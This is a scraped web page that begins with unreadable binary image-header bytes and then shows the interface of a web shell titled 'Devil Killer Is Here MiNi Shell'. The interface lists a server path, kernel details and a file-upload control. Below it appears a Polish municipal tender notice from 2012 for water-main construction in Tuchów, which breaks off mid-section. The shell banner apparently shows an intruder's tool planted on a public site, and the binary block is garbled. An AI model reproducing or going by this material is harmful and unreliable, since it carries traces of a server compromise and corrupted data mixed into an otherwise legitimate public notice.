JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120718/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120718/257648-N-2012.html

<p class="kh_header"><b>Tuchów: Budowa sieci wodociagowej  w Tuchowie :  ul.Górna i Sobieskiego</b><br>
<b>Numer ogłoszenia: 257648 - 2012; data zamieszczenia: 18.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Tuchów , ul. Rynek 1, 33-170 Tuchów, woj. małopolskie, tel. 0146525218 w. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tuchow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sieci wodociagowej  w Tuchowie :  ul.Górna i Sobieskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem wykonania są   roboty budowlane   związane z budową wodociągu w  Tuchwie  na zadaniu pn.:
Budowa sieci wodociagowej  w Tuchowie :  ul.Górna i Sobieskiego

Zakres rzeczowy inwestycji obejmuje  :
-budowę odcinka  wodociągu z rur PE  o śr 110 mm  o dług. ok. 400 mb  /ul.Górna  od bud.nr 35 do Hp3 na dz.nr 2242/2/
-budowa podłączeń do posesji z rur PE o śr.40 mm  o  dług .ok.48,41 mb  /ul.Górna/
-budowa sieci  wodociągowej z rur PE o sr.63 mm   o dług.ok.20 mb  /ul.Górna/  
budowa odcinka sieci  wodociągowej z rur PE o śr.110 mm  o dług.ok. 300 mb /ul.Sobieskiego/ wraz z przekroczeniem drogi powiatowej przewiertem sterowanym / węzeł 0-8 /
budowa podłączeń do posesji z rur PE o sr 50 mm o dług.ok. 30 mb / ul.Sobieskiego/
pełna obsługa geodezyjna,inwentaryzacja powykonawcza geodezyjna/  zgodnie z obowiązującymi przepisami prawa geodezyjnego/
-dokumentacja fotograficzna z realizacji całego zadania 
Opis przedmiotu zamówienia określa załączona do nieniejszej SIWZ kompletna dokumentacja projektowa,specyfikacja techniczna wykonania i odbioru robót budowlanych oraz przedmiar robót.
Zakres  robót  podlegających  trybowi  przetargowemu  musi  być  wykonany  w sposób  zgodny  z  powszechnie  obowiązującymi  warunkami  technicznymi  wykonania i  odbioru  robót  budowlanych, dla  tego  typu  obiektów,                 łącznie z  robotami  towarzyszącymi oraz na warunkach określonych we wzorze umowy.
Szczegółowy  zakres  robót  określa  przedmiar  robót  i  specyfikacja  techniczna  wykonania  i  odbioru  robót  budowlanych ,   które  to  dokumenty  są   załącznikiem  do  specyfikacji  istotnych  warunków  zamówienia
Wykonywanie  robót  musi  uwzględniać  specyfikację  techniczną  wykonania  i  odbioru  robót  budowlanych.                         
Przy  doborze  materiałów  należy  kierować  się  wymaganiami  sprecyzowanymi  w  specyfikacji  technicznej  wykonania 
 i  odbioru  robót. Zaproponowane  materiały  nie  mogą  być  gorszej jakości  niż  w  specyfikacji  technicznej.
Odstępstwo od tych wymagań jest możliwe po uzyskaniu zgody, Inwestora oraz inspektora nadzoru inwestorskiego.
Do  wykonania  robót  należy  użyć  wyłącznie  materiałów  posiadających  wymagane  atesty  i  certyfikaty, które  będą  wymagane  przy  odbiorze  końcowym  robót.
UWAGA: W  uzasadnionych  ekonomicznie i  technologicznie  przypadkach  wyłącznie  za  zgodą  Zamawiającego  - na  etapie  realizacji  zamówienia - w  przypadku  ukazania  się  na  rynku materiałów nowocześniejszych, o  lepszych  właściwościach  i  parametrach, zamawiający  dopuszcza możliwość  ich  zastosowania  w  zamian  za  materiały  zaproponowane  w  ofercie  i  w  projekcie  technicznym .
Jednak  zmiana  ta  nie  może  wpływać  na  zwiększenie  ceny  realizacji  zamówienia  przyjętej  przez  zamawiającego w  wyniku  rozstrzygnięcia   przetargu.
 Zamawiający  zastrzega  sobie  możliwość  ograniczenia  zakresu  umownego  w  trakcie  realizacji  zadania..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.21.50-8, 45.11.20.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.10.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium w wysokości  3000 ,00 zł powinno być wniesione w terminie do  dnia 03.08 .2012. r. do  godz. 10.00  Nie  wniesienie wadium w wymaganym terminie spowoduje odrzucenie oferty, zgodnie z Prawem zamówień publicznych.

Wadium wnoszone w pieniądzu powinno zostać przelane lub wpłacone na rachunek zamawiającego w banku:
Bank  Spółdzielczy  w  Bieczu  - Filia  Tuchów  Nr  75  8627  0001  2023  9000  2645  0004  z  adnotacją: Wadium -  nr sprawy:  [ZP-271-14 /2012 ].


1a. Wadium może być wniesione w jednej z następujących form:

w pieniądzu
poręczeniach lub w poręczeniach  bankowych  lub  poręczeniach  spółdzielczej  kasy  oszczędnościowo - kredytowej,   z tym  że  zobowiązanie  kasy  jest  zawsze  poręczeniem  pieniężnym
gwarancjach bankowych
w gwarancjach ubezpieczeniowych
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b  ust  5 pkt. 2 ustawy z dnia 9 listopada 2000 o  utworzeniu PARP /Dz. U z 2007 r  Nr 42 poz. 275/

Wykonawcy  którzy  zamierzają  wnieść  wadium  w  formie  innej  niż  pieniądz  powinni  złożyć  oryginał  dokumentu  potwierdzający  wniesienie  wadium  w  pokoju   nr  7   dziennik podawczy przed  terminem  składania  ofert

Wadium  wnieść  można  w każdej  formie  wymienionej  w  pkt. 1.1a,/1/ z  tym, że  dowód /kopię  potwierdzoną za  zgodność  z  oryginałem/  należy  umieścić  wewnątrz  oferty.
	
2.Zasady zwrotu wadium
Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4, wraz z odsetkami wynikającymi  z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez  Wykonawcę.

Zgodnie z art. 46  ustawy, wadium zostanie zwrócone :
1.Wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania , z wyjątkiem wykonawcy ,którego oferta została wybrana jako najkorzystniejsza z zastrzeżeniem art.46 ust.4a uPzp.
2.Wykonawcy,którego oferta została wybrana jako najkorzystniejsza ,Zamawiajacy zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia nalezytego wykonania umowy,jeżeli jego wniesienia żądano.
3.Zgodnie z art. 46 ust. 2 ustawy, wadium zostanie zwrócone niezwłocznie po złożeniu pisemnego wniosku przez  wykonawcę   który wycofał ofertę przed upływem terminu składania ofert.
3.Utrata wadium

Zgodnie z art. 46 ust.4a i 5  Prawo zamówień publicznych, wykonawca, którego oferta zostanie wybrana, traci wadium na rzecz Zamawiającego, w przypadku gdy:
nie  wniósł wymaganego  zabezpieczenia należytego wykonania umowy
odmówił  podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
zawarcie umowy w sprawie zamówienia publicznego  stało  się niemożliwe  z przyczyn  leżących po stronie   wykonawcy,
Ponadto zamawiajacy zatrzymuje wadium wraz z odsetkami ,jeżeli wykonawca w odpowiedzi na wezwanie o którym mowa w art.26 ust.3 nie złożył dokumentów lub oświadczeń potwierdzających spełnienie warunków udziału w postępowaniu o którym mowa w art.25 ust1 lub pełnomocnictw chyba,że udowodni ,że wynika to z przyczyn nie leżących po jego stronie.
4.Ponowne wniesienie wadium
Zamawiajacy żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt.14.8 jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza.Wykonawca wnosi w terminie określonym przez Zamawiajacego.
Wykonawców ,którzy nie wnieśli wadium w tym również na przedłużony okres związania ofertą lub nie zgodzili się na przedłużenie okresu związania ofertą ,wyklucza się z postępowania o udzielenie zamówienia a ofertę Wykonawcy wykluczonego uznaje się za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają uprawnienia niezbędne do wykonania zamówienia, jeżeli  ustawy  nakładają  obowiązek  posiadania  takich  uprawnień. 

Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca  udokumentuje uprawnienia do występowania  w obrocie prawnym.

Ocena  tego warunku będzie dokonana  na  podstawie:

aktualnego  odpisu z właściwego rejestru , jeżeli odrębne przepisy wymagają wpisu do rejestru , w celu wykazania braku podstaw do wykluczenia w oparciu o art.24 ust.1 pkt 2 ustawy , wystawionego nie wcześniej niż 6 m - cy  przed upływem terminu składania ofert., a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust.1 pkt 2 ustawy,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadają niezbędną wiedzę i doświadczenie  oraz  dysponują  potencjałem  technicznym  i  osobami  zdolnymi   do  wykonania  zamówienia, lub  przedstawią  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 
a/ w  zakresie  wymaganej wiedzy i   doświadczenia - Zamawiający  wymaga, aby  wykonawca  wykazał  się  co  najmniej   2  robotami   budowlanymi    wykonywanymi  w zakresie sieci  wodociagowej lub kanalizacyjnej o wartości 100 tys.  PLN  każda 


Ocena  tego warunku będzie dokonana  na  podstawie:
wykazu  robót budowlanych w zakresie niezbędnym do wykazania spełnienia warunku wiedzy i doświadczenia 
wykonanych   w  okresie  ostatnich  5  lat  przed upływem terminu składania ofert a jeżeli   okres  prowadzenia  działalności  jest krótszy - w tym  okresie z podaniem ich rodzaju ,wartości ,daty i miejsca wykonania 
oraz załączeniem dokumentu  potwierdzajacego ,że   przedstawione  roboty  budowlane  zostały wykonane  zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone -  załącznik  nr  3   SIWZ.
Do każdej pozycji wyszczególnionej w załączniku nr 3 SIWZ należy załączyć dokument potwierdzający nalezyte wykonanie zamówienia.
Wykonawcy wspólnie ubiegajacy się o udzielenie zamówienia musza wykazać ,że wspólnie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający  wymaga, aby  wykonawca  dysponował odpowiednim potencjałem technicznym do wykonania niniejszego zamówienia.
Zamawiajacy nie wyznacza szczegółowego warunku w tym zakresie i nie żąda dokumentów wykazujących spełnienie przez wykonawcę w/w warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>w  zakresie   dysponowania   odpowiednim potencjałem technicznym do  wykonania  zamówienia.- Zamawiający  wymaga, aby  wykonawca  dysponował odpowiednim potencjałem technicznym do wykonania niniejszego zamówienia.
Zamawiajacy nie wyznacza szczegółowego warunku w tym zakresie i nie żąda dokumentów wykazujących spełnienie przez wykonawcę w/w warunku.
c/  w zakresie  dysponowania osobami zdolnymi do wykonania zamówienia -Zamawiajacy wymaga ,aby wykonawca dysponował 
-kierownikiem budowy posiadającym  uprawnienia  budowlane  w specjalności instalacyjnej w zakresie instalacji wodociagowych i kanalizacyjnych z min.3 letnim doswiadczeniem zawodowym jako kierownik budowy w tym doswiadczenie w zakresie kierowania budową przynajmniej jednego obiektu budowlanego
-posiadania  lub  dysponowania  odpowiednią  ilością  osób  /pracowników  fizycznych/ zdolnych do  wykonania  zamówienia

Przez minimalne kwalifikacje zawodowe dla stanowisk dla których wymagane są uprawnienia budowlane rozumie się lata czynne zawodowo od daty uzyskania uprawnień oraz lata przepracowane na odpowiednich stanowiskach kierowniczych zgodnie z ustawą z dnia 7 lipca 1994r Prawo budowlane /t.j.Dz.U. Z 2010r nr 243 poz.1623/ będącym członkiem Okręgowej Izby Inżynierów Budownictwa.  

W  przypadku  nie dysponowania  osobami  zdolnymi  do  wykonania  zamówienia, a nie  posiadania  potencjału  technicznego  należy  przedstawić  pisemne  zobowiązanie  innych  podmiotów  do  udostępnienia  potencjału  technicznego  i  osób  zdolnych  do  wykonania  zamówienia. 

Ocena tego warunku będzie dokonana w oparciu o:

oświadczenia wykonawcy ,ze osoby ,które będą uczestniczyć w wykonywaniu zamówienia ,posiadają wymagane uprawnienia ,jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień,
sporządzenia  wykazu  osób ,które będą uczestniczyć w wykonywaniu zamówienia , w szczególności odpowiedzialnych za kierowanie robotami budowlanymi  wraz z informacjami na temat ich kwalifikacji zawodowych ,doświadczenia i wykształcenia  niezbędnych dla  wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami - załącznik  nr  4 SIWZ

Wykonawca może polegać na osobach zdolnych do wykonania zamówienia innych podmiotów ,niezależnie od charakteru prawnego łączącego go z nimi stosunków,udowadniając iż będzie dysponował osobami zdolnymi do wykonania zamówienia w szczególności przedstawiając pisemne zobowiązanie tych podmiotów do oddania do dyspozycji niezbędnych osób na okres korzystania z nich przy wykonaniu zamówienia.
W przypadku nie dysponowania osobami zdolnymi do wykonania zamówienia  , a nie posiadania potencjału technicznego nalezy przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia.
Wykonawcy wspólnie ubiegajacy się o udzielenie zamówienia muszą wykazać ,że wspólnie spełniają powyzszy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca :

był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę 
nie mniejszą  niż  100  tyś.  PLN oraz ,że znajduje się w dobrej sytuacji finansowej i ekonomicznej.

Ocena tego warunku zostanie dokonana w oparciu o:

opłaconej polisy  lub  inny  dokument  ubezpieczenia  potwierdzający, że  wykonawca  jest  ubezpieczony od odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej,  

-oświadczenia ,że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej ,złożonego  w dokumencie o nazwie oświadczenia - załącznik nr 2 SWIZ

Wykonawcy wspólnie ubiegajacy się o udzielenie zamówienia muszą wykazać,że wspólnie spełniają powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
